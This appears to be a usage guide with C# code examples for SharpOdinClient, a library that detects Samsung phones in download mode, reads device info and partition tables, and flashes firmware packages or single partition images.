using SharpOdinClient.util;
Subscribe for events
Code:
public MainWindow()
{
InitializeComponent();
Odin.Log += Odin_Log;
Odin.ProgressChanged += Odin_ProgressChanged;
}
private void Odin_ProgressChanged(string filename, long max, long value, long WritenSize)
{
}
private void Odin_Log(string Text, SharpOdinClient.util.utils.MsgType Color)
{
}
Find Automatically samsung devices in download mode
Code:
{
//Find Auto odin device
var device = await Odin.FindDownloadModePort();
//device name
Console.WriteLine(device.Name);
// COM Port Of device
Console.WriteLine(device.COM);
// VID and PID Of Device
Console.WriteLine(device.VID);
Console.WriteLine(device.PID);
}
Read Info from device
Code:
{
if(await Odin.FindAndSetDownloadMode())
{
//get info from device
var info = await Odin.DVIF();
await Odin.PrintInfo();
}
}
in info variable we get dictionary of string , string The concept of some 'keys'
capa = Capa Number
product = Product Id
model = Model Number
fwver = Firmware Version
vendor = vendor
sales = Sales Code
ver = Build Number
did = did Number
un = Unique Id
tmu_temp = Tmu Number
prov = Provision
Read Pit from device
Code:
{
if(await Odin.FindAndSetDownloadMode())
{
await Odin.PrintInfo();
if (await Odin.IsOdin())
{
if(await Odin.LOKE_Initialize(0))
{
var Pit = await Odin.Read_Pit();
if (Pit.Result)
{
var buffer = Pit.data;
var entry = Pit.Pit;
}
}
}
}
}
for doing any action in download mode , need first to check IsOdin and Run LOKE_Initialize argument, if you do not want to write anything on device set LOKE_Initialize totalfilesize parameter to zero(0)
buffer = is byte array of pit from device , you can write this buffer on file for saving pit entry = is list of partition information of your device
Write Pit On Device
Code:
/// <summary>
/// write pit file on your device
/// </summary>
/// <param name="pit">in this parameter, you can set tar.md5 contains have pit file(Like csc package of firmware)
/// or pit file with .pit format
/// </param>
/// <returns>true if success</returns>
public async Task<bool> Write_Pit(string pit)
{
if (await Odin.FindAndSetDownloadMode())
{
await Odin.PrintInfo();
if (await Odin.IsOdin())
{
if (await Odin.LOKE_Initialize(0))
{
var Pit = await Odin.Write_Pit(pit);
return Pit.status;
}
}
}
return false;
}
pit parameter = if you want to write pit from tar or tar.md5(Like CSC) file on device you can set your tar type file path , also you can set your pit single file with .pit format file
Flash List Of tar.md5 package on device
Code:
/// Add List Of Your tar package (bl,ap,cp,csc , or more)
/// </summary>
/// <param name="ListOfTarFile">add tar type files path in this list</param>
/// <returns></returns>
public async Task<bool> FlashFirmware(List<string> ListOfTarFile)
{
var FlashFile = new List<FileFlash>();
foreach(var i in ListOfTarFile)
{
var item = Odin.tar.TarInformation(i);
if(item.Count > 0)
{
foreach (var Tiem in item)
{
if (!Exist(Tiem , FlashFile))
{
var Extension = System.IO.Path.GetExtension(Tiem.Filename);
var file = new FileFlash
{
Enable = true,
FileName = Tiem.Filename,
FilePath = i
};
if (Extension == ".pit")
{
//File Contains have pit
}
else if (Extension == ".lz4")
{
file.RawSize = Odin.CalculateLz4SizeFromTar(i, Tiem.Filename);
}
else
{
file.RawSize = Tiem.Filesize;
}
FlashFile.Add(file);
}
}
}
}
if(FlashFile.Count > 0)
{
var Size = 0L;
foreach (var item in FlashFile)
{
Size += item.RawSize;
}
if (await Odin.FindAndSetDownloadMode())
{
await Odin.PrintInfo();
if (await Odin.IsOdin())
{
if (await Odin.LOKE_Initialize(Size))
{
var findPit = FlashFile.Find(x => x.FileName.ToLower().EndsWith(".pit"));
if(findPit != null)
{
var res = MessageBox.Show("Pit Finded on your tar package , you want to repartition?", "", MessageBoxButton.YesNo);
if (res == MessageBoxResult.Yes)
{
var Pit = await Odin.Write_Pit(findPit.FilePath);
}
}
var ReadPit = await Odin.Read_Pit();
if (ReadPit.Result)
{
var EfsClearInt = 0;
var BootUpdateInt = 1;
if (await Odin.FlashFirmware(FlashFile, ReadPit.Pit, EfsClearInt, BootUpdateInt, true))
{
if (await Odin.PDAToNormal())
{
return true;
}
}
}
}
}
}
}
return false;
}
for flashing tar,tar.md5 contains files(lz4 , image, bin and more ...) we need to create list of FileFlash from you tar package information.
Enable property in FileFlash is bool if you set this propery to false, SharpOdinClient does not Flash on the phone.
in FlashFirmware function , SharpOdinClient can write lz4 from contains of your tar package
Flash Single File
You can Flash your single file like boot.img or more files on partitions
Code:
/// <summary>
/// Flash Single File lz4 , image
/// </summary>
/// <param name="FilePath">path of your file</param>
/// <param name="PartitionFileName">like boot.img , sboot.bin or more ...</param>
/// <returns></returns>
public async Task<bool> FlashSingleFile(string FilePath , string PartitionFileName)
{
var FlashFile = new FileFlash
{
Enable = true,
FileName = PartitionFileName,
FilePath = FilePath,
RawSize = new FileInfo(FilePath).Length
};
if (await Odin.FindAndSetDownloadMode())
{
await Odin.PrintInfo();
if (await Odin.IsOdin())
{
if (await Odin.LOKE_Initialize(FlashFile.RawSize))
{
var ReadPit = await Odin.Read_Pit();
if (ReadPit.Result)
{
var EfsClearInt = 0;
var BootUpdateInt = 0;
if (await Odin.FlashSingleFile(FlashFile, ReadPit.Pit, EfsClearInt, BootUpdateInt, true))
{
if (await Odin.PDAToNormal())
{
return true;
}
}
}
}
}
}
return false;
}
Changelog
V1.0.0.9 : {Find auto serialport , read information , read pit , write pit , write single flash file , write multiple flash file(Tar archive with lz4 , image contains file)}
Changelog
V1.0.1.9, {added calculate lz4 file size from tar file}
download
Github
NuGet